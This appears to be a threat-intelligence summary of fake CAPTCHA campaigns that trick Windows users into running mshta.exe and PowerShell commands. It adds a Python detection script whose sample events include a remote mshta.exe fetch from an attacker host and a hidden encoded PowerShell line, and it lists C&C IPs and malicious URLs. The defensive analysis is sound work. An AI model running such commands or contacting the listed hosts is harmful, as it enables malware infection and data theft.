Trend Micro researchers uncovered new fake CAPTCHA campaigns leveraging disguised MP3 and HTML files that trick Windows users into running malicious scripts via the Run dialog, leading to data theft and remote access through malware like Lumma Stealer, Emmental, Rhadamanthys, AsyncRAT, and XWorm. These sophisticated attacks use phishing, SEO poisoning, and malvertising to deliver obfuscated, multistage payloads executed in memory via mshta.exe and PowerShell, evading traditional detection. #FakeCAPTCHA #LummaStealer #Emmental #AsyncRAT #XWorm
Keypoints
- Fake CAPTCHA pages instruct victims to copy-paste obfuscated commands into Windows Run dialog (Win + R), triggering execution of malicious scripts via mshta.exe or PowerShell.
- Attackers embed highly obfuscated JavaScript inside otherwise legitimate MP3 files—originally from royalty-free sources—to deliver multi-stage payloads in memory, evading file-based detection.
- Malware payloads include information stealers and remote access tools such as Lumma Stealer, Emmental, Rhadamanthys, AsyncRAT, and XWorm, often delivered via phishing emails, malvertising, SEO poisoning, and file-sharing services.
- Phishing campaigns use trusted-looking domains, formal language, and urgency-themed email subjects to lure users to fake CAPTCHA landing pages that appear as authentic human verification prompts.
- Attackers dynamically update URLs hosting malicious scripts to maintain campaign continuity despite remediation efforts.
- Infections involve execution of multi-stage PowerShell scripts, code injection into svchost.exe, DLL sideloading with fake executables, and establishing C&C communication via Chromium-based browsers and local web servers.
- Mitigation strategies include disabling Run dialog access, enforcing least privilege, restricting unapproved software and file-sharing services, monitoring clipboard and process activities, hardening browser settings, enabling memory protection, and investing in user security awareness and managed detection and response (MDR).
MITRE Techniques
- [T1204] User Execution – Users are socially engineered to paste malicious commands into the Windows Run dialog, enabling initial execution (‘…instructing users to copy and paste a malicious command in the Windows run dialog…’).
- [T1047] Windows Management Instrumentation – Execution of mshta.exe to run HTML Application (HTA) files and embedded scripts (‘…mshta.exe executes the file lyricalsync.mp3 containing obfuscated JavaScript…’).
- [T1059] Command and Scripting Interpreter – Use of PowerShell with encoded and obfuscated commands to remotely download and execute payloads (‘…PowerShell.exe runs base64-encoded payload downloaded from remote URLs…’).
- [T1105] Ingress Tool Transfer – Malicious scripts download additional payloads such as Lumma Stealer and others through HTTP(S) requests (‘…connects to URLs like bi.yuoie[.]shop and mediafire.com to download obfuscated payloads…’).
- [T1055] Process Injection – The PowerShell script injects code into svchost.exe to execute further components (‘…performs code injection to svchost.exe, which spawns legitimate-looking processes…’).
- [T1218] Signed Binary Proxy Execution – Abuse of legitimate Windows binaries such as mshta.exe and PowerShell.exe to execute malicious scripts (‘…continued use of mshta.exe and PowerShell is due to their accessibility and ability to evade detection…’).
- [T1071] Application Layer Protocol – Use of C&C communication over HTTP on localhost and remote servers via Chromium browsers (‘…launches Chromium-based browsers to open local webserver http://127.0.0.1:8000/…’).
- [T1574] Hijack Execution Flow – DLL sideloading via AvastBrowserUpdate.exe and goopdate.dll to execute malicious code (‘…loading a malicious DLL file goopdate.dll using DLL sideloading…’).
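As an added example for the execution chain summarised in the Keypoints and the MITRE Techniques above (this is illustrative code written for this summary, not code from Trend Micro or from the original report): detection logic in Python run over constructed, Sysmon-style process-creation events. It flags the stages the report describes (a user-launched mshta.exe handed a URL or a non-HTA file such as an .mp3, encoded PowerShell spawned from a script host, svchost.exe with an unexpected parent, and a Chromium browser pointed at a loopback web server) and raises a chain-level verdict only when the Run-dialog and PowerShell stages both appear. The event field names, the sample events, the rule names and the base64 string are assumptions made for this example; the only page-derived values are the lyricalsync.mp3 file name, the ernier[.]shop host and the 127.0.0.1:8000 address.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (field names are an assumption, not a real schema)."""
    parent: str   # parent process image name
    image: str    # created process image name
    cmdline: str  # full command line of the created process


# Extensions the report describes being passed to mshta.exe in place of a real .hta:
# disguised MP3/HTML files and a PowerShell script renamed to .xlsx.
DISGUISED_EXTENSIONS = (".mp3", ".html", ".xlsx")

# A command typed into the Run dialog (Win + R) is launched by the desktop shell.
USER_LAUNCHERS = {"explorer.exe"}

# Script hosts the report names as the stages that spawn PowerShell.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe"}

ENCODED_PS = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}")
HIDDEN_PS = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden")
LOOPBACK_URL = re.compile(r"(?i)https?://127\.0\.0\.1:\d+/")
CHROMIUM_BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}


def detect(event: ProcEvent) -> list[str]:
    """Return the names of every rule this single event triggers (empty list if none)."""
    hits: list[str] = []
    img, parent, cmd = event.image.lower(), event.parent.lower(), event.cmdline

    # Rule 1: mshta.exe launched by the shell (Run dialog) with a URL or a non-HTA file.
    if img == "mshta.exe" and parent in USER_LAUNCHERS:
        if "://" in cmd or cmd.lower().rstrip().endswith(DISGUISED_EXTENSIONS):
            hits.append("mshta_run_dialog_disguised_payload")

    # Rule 2: PowerShell with an encoded and/or hidden command line.
    if img in ("powershell.exe", "pwsh.exe"):
        encoded = bool(ENCODED_PS.search(cmd))
        hidden = bool(HIDDEN_PS.search(cmd))
        if encoded and parent in SCRIPT_HOSTS:
            hits.append("powershell_encoded_from_script_host")
        elif encoded or hidden:
            hits.append("powershell_encoded_or_hidden")

    # Rule 3: svchost.exe not parented by services.exe (injection / masquerade heuristic).
    if img == "svchost.exe" and parent != "services.exe":
        hits.append("svchost_unexpected_parent")

    # Rule 4: a Chromium browser opened on a loopback web server, the local C&C stage.
    if img in CHROMIUM_BROWSERS and LOOPBACK_URL.search(cmd):
        hits.append("browser_loopback_c2")
    return hits


def triage(events: list[ProcEvent]) -> dict:
    """Run every rule over a batch and set 'chain' only when both the Run-dialog mshta.exe
    stage and the encoded-PowerShell stage are present, the pairing the report describes."""
    per_event = {i: detect(e) for i, e in enumerate(events)}
    seen = {h for hits in per_event.values() for h in hits}
    chain = ("mshta_run_dialog_disguised_payload" in seen
             and "powershell_encoded_from_script_host" in seen)
    return {"hits": per_event, "chain": chain}


# Constructed sample events (not telemetry from the report). The base64 string is the
# UTF-16LE encoding of a short PowerShell fragment, built only to exercise Rule 2.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "mshta.exe", "mshta.exe https://ernier[.]shop/lyricalsync.mp3"),
    ProcEvent("mshta.exe", "powershell.exe",
              "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcEvent("powershell.exe", "svchost.exe", "svchost.exe"),
    ProcEvent("svchost.exe", "chrome.exe", "chrome.exe http://127.0.0.1:8000/"),
    ProcEvent("explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\user\\notes.txt"),
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for i, hits in result["hits"].items():
        print(f"event {i}: {SAMPLE_EVENTS[i].image:<16} -> {hits or 'clean'}")
    print("fake-CAPTCHA chain present:", result["chain"])
```

Rule 1 is the one with the lowest false-positive rate and is the cheapest to deploy, since mshta.exe being started by explorer.exe with a URL or an audio/document extension has no routine business use; Rules 3 and 4 are heuristics that need local baselining (service-hosted svchost.exe and developer web servers on loopback are both normal on some hosts), which is why the chain verdict is built only from Rules 1 and 2.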
Indicators of Compromise
- [URLs] Fake CAPTCHA landing pages and payload hosting – ernier[.]shop/lyricalsync[.]mp3, guest-idreserve[.]com, bi.yuoie[.]shop/750413b4e6897a671bc759e04597952a0be747830189873b.xlsx, mediafire[.]com/download2431
- [File Hashes] Obfuscated malicious scripts detected as Trojan.JS.EMMENHTAL.SM and PUA.Win32.FakeGoop.A.component – hash samples in attached reports (and 3 more hashes)
- [File Names] Lyricalsync.mp3 (malicious MP3 with embedded JavaScript), AvastBrowserUpdate.exe (malicious executable), goopdate.dll (malicious DLL sideloaded), 750413b4e6897a671bc759e04597952a0be747830189873b.xlsx (malicious PowerShell script disguised as XLSX)
- [IP Addresses] Command and control server – 176.65.141.165:8587, 185.7.214.108 (AsyncRAT/XWorm hosting), and others linked to malware distribution infrastructure
- [Email Subjects] Phishing themes – “Action Required – Guest’s Valuable Items Left Behind”, “Security Alert: Guest’s Laptop and Phone Left at Property”, “Urgent Attention – Guest Items at Your Hotel”
Read more: https://www.trendmicro.com/en_us/research/25/e/unmasking-fake-captcha-cases.html